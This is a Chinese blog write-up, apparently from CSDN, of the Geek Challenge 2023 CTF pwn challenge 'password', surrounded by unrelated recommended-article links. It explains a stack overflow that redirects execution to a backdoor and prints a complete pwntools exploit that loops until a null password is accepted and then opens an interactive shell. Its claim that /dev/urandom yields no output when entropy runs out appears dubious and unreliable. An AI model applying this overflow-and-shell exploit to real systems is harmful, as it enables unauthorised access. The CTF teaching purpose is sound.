Geek Challenge 2023 pwn password

最新推荐文章于 2024-07-08 13:09:27 发布
最新推荐文章于 2024-07-08 13:09:27 发布
阅读量416 收藏 10
点赞数 10
分类专栏: Geek Challenge 2023 pwn CTF 文章标签: 网络安全 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_69743753/article/details/134568298
版权
Geek Challenge 2023 同时被 3 个专栏收录
19 篇文章 0 订阅
订阅专栏
CTF
19 篇文章 0 订阅
订阅专栏
pwn
9 篇文章 0 订阅
订阅专栏

题解

在向buf输入数据时存在栈溢出,刚好覆盖返回地址,同时这个程序存在后门函数

可以控制程序执行后门函数

但是它还要对第二次输入的数据进行判断,是否与password相等,不相等就直接退出了,就算修改了返回地址也不会执行

password是从/dev/urandom中读取的数据

但这个/dev/urandom文件是有一个问题

所以当熵池中还不存在任何熵的时候,它就没有输出了

所以只要大量读取数据,它就是没有输出,那password就是初始值了,即0

EXP

from pwn import *
context.arch='amd64'
while(1):
	p=remote('x',0)
	payload=b'a'*40+p64(0x4012F3)
	p.recvuntil('please enter user name:\n')
	p.send(payload)
	p.recvuntil('please enter password:\n')
	p.sendline(b'\x00')
	result=p.recvline()
	if b'Wrong password!' in result:
		p.close
	else :
		break
p.interactive()

程序运行可以要一会

结语

(本人是菜鸟,想找对CTF感兴趣的CTFer,一起交流学习,共同进步,迈向星辰大海!!!!^_^(有兴趣的加扣群:470196890))

north956
关注
  • 10
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2020第十一届极客大挑战——Geek Challenge(部分解)
weixin_45794666的博客
12-19 1万+
Crypto 二战情报员刘壮 考点:摩斯密码 通过 1.简介中直接看出是摩斯密码 2.通过在线网站直接解密得到flag 铠甲与萨满 考点:凯撒密码 1.通过题目和提示知道是凯撒密码 2.通过CrakTools直接解密找到SYC即可 成都养猪二厂 考点:猪圈密码,栅栏密码 1.[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-w1bVRQgi-1608350560768)(http://image.liangyueliangyue.top/writeup-image/image
2021极客大挑战WP集合
Love&Share
11-20 1848
WP来自齐鲁师范学院网络安全社团 关注公众号接收更多最新的安全讯息 文章目录WEBDarkWelcome2021babypybabyphpbabypopwhere_is_my_FUMO蜜雪冰城甜蜜蜜easyPOPbabysqlBaby_PHP_Black_Magic_Enlightenment人民艺术家givemeyourloveRERe0调试easypyc刘壮桌面美化大师PWNRetxxxeasycanaryeasyfmt恋爱小游戏恋爱小游戏2.0checkinpwn777MISC今天有被破防吗Cryp
Geek Geek Geek
04-30
在这个标题为“Geek Geek Geek”的主题中,我们可以深入探讨一下与“Geek”相关的各种IT知识领域。 首先,我们要理解的是,“Geek”不仅仅是对计算机编程感兴趣的人,它涵盖了广泛的科技爱好者,包括但不限于软件...
Geek Challenge [SKRZAT]
07-04
Geek Challenge [SKRZAT] is an old, old game from Poland that uses a game console with two buttons plus a joy stick. As is true to its name, the game communicates in binary, so that one button ...
geek uninstaller(2023最新版)
08-07
内容概要:这是一个windows平台的专业卸载工具,它可以连带安装软件的注册表一同清理掉,也就是将软件的所有相关的文件全部删除,可真正的将安装软件连根拔起。 适用人群:想要深度删除软件的人,同时又对注册表...
geek uninstaller
08-19
"Geek Uninstaller"是一款专为解决传统卸载方法无法彻底清除软件残留问题而设计的高效卸载工具。在日常的计算机使用过程中,有时我们可能会遇到一些软件在卸载后仍留下痕迹,如注册表项、文件夹或系统设置,这可能...
geek 用来卸载流氓软件
05-07
"geek"(通常指的是Geek Uninstaller)就是这样一款高效、强大的卸载工具,专为卸载那些常规方式难以清理的软件而设计。 Geek Uninstaller的主要功能在于其深度卸载能力。它能够彻底清除选定程序的所有痕迹,包括...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8328
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
2024-07-05 base SAS programming学习笔记9(variables)
ddjdd1234的博客
07-05 474
由于SAS 每次都会执行IF THEN 语句,因此在对同一个变量进行操作时使用IF THEN ELSE IF THEN 语句来提高效率,避免重复使用IF-THEN 语句,在碰到TRUE的情况则会跳出该IF 语句。如果不存在select expression ,则会对每个when 语句判断TRUE或FALSE,SAS只会执行首次判断为TRUE的语句,一旦存在TRUE语句则跳出不对其他WHEN语句进行判断。在每次DO循环前检查是否满足WHILE的条件,只有满足WHILE的条件才继续循环,如果不满足则终止循环。
[笔记] 高等数学在各工程门类的典型应用场景
含光左卫的工作笔记集
07-04 946
必须引入高等数学知识才能解决的问题,相关工业门类及问题概述;包含复杂信号时域分析与微小信号提取技术相关的书目,期刊
pandas,dataframe使用笔记
分享计算机视觉,C++,嵌入式等知识。
07-05 458
dataframe属于pandas。
C语言学习笔记[21]:分支语句if...else
the_white_hole的博客
07-04 427
C语言是结构化的程序设计语言分支语句对应的就是选择结构,循环语句对应的就是循环结构分支语句循环语句goto语句。
【论文阅读笔记】Meta 3D AssetGen
weixin_43357695的博客
07-06 740
我们提出了 Meta 3D AsetGen (AssetGen),这是文本到 3D 生成的重大进步,它产生了忠实、高质量的网格,具有纹理和材料控制。与在 3D 对象外观中烘烤阴影的作品相比,AsetGen 输出基于物理的渲染 (PBR) 材料,支持逼真的重新照明。AsetGen 使用分解阴影和反照率外观通道生成对象的前几个视图,然后使用延迟阴影损失重建 3D 中的颜色、金属度和粗糙度以进行有效监督。**它还使用符号距离函数更可靠地表示 3D 形状,并为直接形状监督引入了相应的损失。
数据结构学习笔记-十大排序算法
2301_81135589的博客
07-03 459
进行S趟k路归并,把k个归并段的块读入k个输入缓冲区,用“归并排序”的方法从k个归并段中选出几个最小记录,暂存到输出缓冲区中,当输出缓冲区满时,写出外存。6)重复3)~5),直至在WA中选不出新的MINIMAX记录为止,由此得到一个初始归并段,输出一个归并段的结束标志到FO中去。设初始待排文件为FI,初始归并段输出文件为FO,内存工作区为WA,FO和WA的初始状态为空,WA可容纳w个记录到工作区WA。5)从WA中所有关键字比MINMAX记录的关键字大的记录中选出最小关键字记录,作为新的MINIMAX记录。
vb.net&cad二开自学笔记2:认识vs编辑器
nianfen的博客
07-06 245
认识一下宇宙第一编辑器的界面图标含义还是很重要的,否则都不知道面对的是什么还怎么继续?变量长方体:变量局部变量两个矩形块:枚举预定义的枚举紫色立方体:方法橙色树状结构:类灰色块:自定义的代码片段接口/typedef向左对齐的关键字图标倒着脸的结构体图标显得规规矩矩的宏定义图标大括号的命名空间图标事件属性委托。
[笔记] 卷积 - 01 变速箱需要放置多少个加速度传感器?
含光左卫的工作笔记集
07-03 947
卷积运算以及在振动分析中的应用。一些笔记和讨论。其他的卷积运算适用的场合,如信号与系统,机械涉及,机器学习可以参考。
libusb注意事项笔记
cai742925624的专栏
07-03 477
libusb注意事项笔记
【前端项目笔记】9 数据报表
C_greenbird的博客
07-05 349
效果展示:在开发代码之前新建分支新建分支reportgit branch查看分支将本地report分支推送到云端origin并命名为report。
C++17 filesystem 库 学习笔记
最新发布
Learning
07-08 687
对 std::filesystem 官方文档的学习笔记
geek unlnstaller官网
06-27
Geek Uninstaller是一款免费的软件卸载工具,其官网提供了最新版本的软件下载和详细的功能介绍。在官网上,用户可以下载到各种版本的Geek Uninstaller,包括免费版和Pro版。其中,免费版提供了基本的软件卸载功能,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值